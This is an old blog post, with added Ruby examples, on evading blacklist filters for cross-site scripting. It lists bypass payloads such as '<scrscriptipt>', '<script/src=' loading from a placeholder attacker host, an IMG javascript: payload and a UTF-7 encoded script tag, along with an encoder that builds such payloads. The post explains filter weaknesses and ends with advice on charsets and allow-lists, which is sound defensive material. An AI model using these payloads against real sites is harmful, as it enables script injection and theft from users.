Defeating input filters for injection
Friday, May 4, 2007 at 11:58AM

Malicious input in URLs in particular looks suspicious to anyone who has heard of these attacks, and to a security scanner. So an attacker will try to hide the suspicious parts from the victim or from the scanner. For a human being this can be as simple as displaying a tidy-looking link or an image that actually points to a malicious URL, or burying the malicious part in a very long URL where it does not stand out. Automatic scanners call for different techniques. If the web application's filter does not remove all HTML tags from the input but relies on a blacklist, the attacker can use the following alternatives to the <script> tag, which work in most web browsers:
- <<script> (defeats a scanner that filters <script> by comparing the string between the first < and the next >: that string is <script, not script)
- <scrscriptipt> (defeats a scanner that removes the word script in a single pass: removing it once leaves <script>)
- <script/src=... (defeats a scanner that looks for <script> or <script src=...; browsers accept / as an attribute separator)
- <script a=">" " src=... (defeats a scanner that allows <script> but not <script src=...: a check that reads the tag up to the first > stops inside the quoted attribute value and never sees src)
- or put a line feed after each character (works in Internet Explorer 6.0)
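The following Ruby is an added example, not code from the original post or from any project it describes. It reproduces the three kinds of blacklist check the list above defeats, shows what each makes of the listed payloads, and puts an allow-list check beside them that reads tag names roughly the way a browser tokenizer does. The attacker URL and the set of permitted tags are placeholders chosen for the illustration.

```ruby
# Added example (not from the original post): the blacklist checks the post
# describes, each defeated by one of its payloads, beside an allow-list check
# that reads tag names roughly the way a browser's tokenizer does.

# The payloads listed in the post. The attacker URL is a placeholder.
BYPASSES = [
  "<<script>alert('XSS')</script>",
  "<scrscriptipt>alert('XSS')</scrscriptipt>",
  "<script/src=http://attacker.example/x.js></script>",
  "<script a=\">\" \" src=http://attacker.example/x.js></script>",
  "<s\nc\nr\ni\np\nt>alert('XSS')</script>",
].freeze

# Blacklist 1: delete the word "script". A single gsub pass never re-scans the
# text it just produced, so "scr" + "script" + "ipt" collapses to "script".
def strip_script_word(html)
  html.gsub(/script/i, "")
end

# Repeating the pass until nothing changes closes that hole, but it is still a
# blacklist: every other dangerous tag and attribute would have to be listed.
def strip_script_word_repeatedly(html)
  loop do
    stripped = strip_script_word(html)
    return stripped if stripped == html
    html = stripped
  end
end

# Blacklist 2: take "whatever sits between a < and the next >" as the tag and
# compare its name with "script". "<<script>" yields the name "<script" and
# "<script/src=..." yields "script/src=...", so neither compares equal.
def contains_script_tag?(html)
  html.scan(/<([^>]*)>/).flatten.any? do |inner|
    inner.split(/\s+/).first.to_s.casecmp?("script")
  end
end

# Blacklist 3: allow <script> but refuse <script ... src=...>. [^>]* stops at
# the > inside a=">", so the src attribute that follows is never examined.
def contains_script_src?(html)
  html.match?(/<script[^>]*src/i)
end

# Allow-list instead: collect tag names the way the HTML tokenizer does (a <
# followed by an ASCII letter starts a tag; the name ends at whitespace, / or >)
# and refuse anything not explicitly permitted. The permitted set is illustrative.
ALLOWED_TAGS = %w[a b br em i p strong].freeze

def tag_names(html)
  html.scan(%r{</?([A-Za-z][^\s/>]*)}).flatten.map(&:downcase)
end

def allow_listed?(html)
  tag_names(html).all? { |name| ALLOWED_TAGS.include?(name) }
end

# Which blacklists a payload slips past, and whether the allow-list catches it.
def verdicts(payload)
  {
    passes_word_strip:    strip_script_word(payload).match?(/<script/i),
    passes_tag_scan:      !contains_script_tag?(payload),
    passes_src_regex:     !contains_script_src?(payload),
    caught_by_allow_list: !allow_listed?(payload),
  }
end

if __FILE__ == $PROGRAM_NAME
  BYPASSES.each do |p|
    puts "#{p.inspect}\n  #{verdicts(p)}"
  end
end
```

Each payload is aimed at one particular filter design, which is why the verdicts differ per payload; the allow-list check refuses all of them, including <scrscriptipt>, which is only dangerous because the word-stripping filter itself turns it into a script tag.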
Another very effective way to hide angle brackets or other characters from a security scanner is to use a character encoding that the web browser can process but the web application cannot. There are many ways to encode characters, but the browser has to read the document in that encoding. If the encoding is set to Auto-Select in Internet Explorer and there is a UTF-7 or UTF-8 encoded string in the first 4096 bytes, it will automatically treat the document as UTF-7 or UTF-8.
If the user has set this option and/or the web application does not send a default character encoding, as is the case with Rails applications by default, cryptic UTF-8 encoded variants of the following will pop up a message box when injected (shown here in decoded form):
<IMG src=javascript:alert('XSS')>
And if the user has set the browser to UTF-7 encoding, injecting the following will pop up a message box. Note that it does not include any angle brackets, so it may bypass filters that look for them.
+ADw-SCRIPT+AD4-alert('vulnerable');+ADw-/SCRIPT+AD4-
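The following Ruby is an added example, not code from the original post. It implements a small RFC 2152 UTF-7 encoder and decoder so the payload above can be taken apart: the decoder shows what a browser in UTF-7 mode sees, the encoder shows how such a payload is built, and a filter that only looks for angle brackets is run over both forms. The function names are the example's own; the payload string is the one from the post.

```ruby
# Added example (not from the original post): a small RFC 2152 UTF-7 codec
# used to show what a browser in UTF-7 mode makes of the post's payload, and
# why a filter that only looks for angle brackets never sees them.

UTF7_PAYLOAD = "+ADw-SCRIPT+AD4-alert('vulnerable');+ADw-/SCRIPT+AD4-"

B64 = ([*"A".."Z", *"a".."z", *"0".."9"] + ["+", "/"]).join.freeze

# Modified base64 (RFC 2152): plain base64 of UTF-16BE with no "=" padding;
# leftover bits at the end of a run are zero padding and are dropped.
def mb64_encode(bytes)
  out = +""
  acc = 0
  nbits = 0
  bytes.each_byte do |b|
    acc = (acc << 8) | b
    nbits += 8
    while nbits >= 6
      nbits -= 6
      out << B64[(acc >> nbits) & 0x3F]
    end
  end
  out << B64[(acc << (6 - nbits)) & 0x3F] if nbits > 0
  out
end

def mb64_decode(text)
  acc = 0
  nbits = 0
  bytes = []
  text.each_char do |ch|
    acc = (acc << 6) | B64.index(ch)
    nbits += 6
    if nbits >= 8
      nbits -= 8
      bytes << ((acc >> nbits) & 0xFF)
    end
  end
  bytes.pack("C*")
end

# Encode: each run of characters in +chars+ becomes "+<mb64>-", a literal "+"
# becomes "+-", everything else passes through directly. Encoding only the
# angle brackets reproduces the post's payload exactly.
def utf7_encode(str, chars: "<>")
  shifted = Regexp.new("[#{Regexp.escape(chars)}]+|\\+")
  str.gsub(shifted) do |m|
    m == "+" ? "+-" : "+#{mb64_encode(m.encode('UTF-16BE'))}-"
  end
end

# Decode: "+" starts a shifted run of modified base64 that ends at the first
# character outside the alphabet; a terminating "-" is absorbed; "+-" is "+".
def utf7_decode(str)
  out = +""
  i = 0
  while i < str.length
    unless str[i] == "+"
      out << str[i]
      i += 1
      next
    end
    j = i + 1
    j += 1 while j < str.length && B64.include?(str[j])
    if j == i + 1
      out << "+"
    else
      bytes = mb64_decode(str[(i + 1)...j])
      raise ArgumentError, "malformed UTF-7: odd number of UTF-16 bytes" if bytes.bytesize.odd?
      out << bytes.force_encoding("UTF-16BE").encode("UTF-8")
    end
    i = (j < str.length && str[j] == "-") ? j + 1 : j
  end
  out
end

# The filter the post has in mind: it only looks for angle brackets, so the
# encoded form passes and only the decoded form is refused.
def blocks_angle_brackets?(input)
  input.match?(/[<>]/)
end

if __FILE__ == $PROGRAM_NAME
  decoded = utf7_decode(UTF7_PAYLOAD)
  puts "raw payload blocked?    #{blocks_angle_brackets?(UTF7_PAYLOAD)}"
  puts "browser in UTF-7 sees:  #{decoded}"
  puts "decoded form blocked?   #{blocks_angle_brackets?(decoded)}"
  puts "re-encoded == payload?  #{utf7_encode(decoded) == UTF7_PAYLOAD}"
end
```

The lesson is that the application and the browser must agree on the encoding before any filtering happens: declare the charset explicitly in the Content-Type header (and in the document) so the browser never has to guess, and filter the input after decoding it into that same charset.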
Heiko



Reader Comments (249)
Quite interesting. Thank you for writing this up.
I have been looking for sites like this for a long time. Thank you!